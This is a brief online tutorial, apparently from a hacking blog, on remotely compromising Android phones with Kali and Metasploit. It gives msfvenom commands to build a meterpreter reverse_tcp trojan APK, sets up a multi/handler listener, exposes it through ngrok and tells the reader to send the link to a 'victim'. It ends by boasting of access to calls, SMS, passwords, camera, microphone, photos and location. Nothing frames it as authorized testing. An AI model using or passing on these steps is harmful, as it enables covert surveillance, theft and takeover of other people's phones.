Metasploit : Mobile Hacking

0

Hack Smart Phone Using Kali(Remotely)

 

Hello Hackers,
This is a tutorial explaining how to hack smart phones with kali.

STEP 1: OPEN KALI/PARROT:

# Open up your terminal and create a Trojan file (that can be named anything)
# It can be easily done by these commands:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=”ip” LPORT=4444 R> /root/Desktop/y2.apk


STEP 2: Open another terminal

# Open another terminal until the file is in process
# Load  metasploit console.
 
        $ service postgresql start
        $ msfconsole
It looks like:
 

 STEP 3: Set up listener

IT TAKES SOME TIME TO LOAD
# After it loads , now loads the multi-handler exploit, Now type:
  $ use multi/handler
Set up a reverse payload :

$ set payload android/meterpreter/reverse_tcp

# Now set LHOST  :
   $ set lhost = “your ip address”
# Now set LPORT  :
   $ set lport = 4444
# Now exploit :
   $ exploit
 

NOW YOUR TROJAN IS READY , NOW YOU NEED TO PASS THIS FILE TO THE VICTIM’S PHONE:


STEP 4: PORT FORWARDING

# we use ngrok to create a secure tunnel.
  $ ./ngrok http 80
 
 
  • Now send the link to victim (on same network or over the network)
 
 

ADVANTAGE :

# Easily excess call details, sms, Passwords.
# Easily excess on camera,microphone.
# Easily can send messages to anyone over what’s app,sms, Instagram or any social app.
# Easily excess over photos, Videos and Data .
# Can delete or add Data on Victim’s phone .
# Current Location.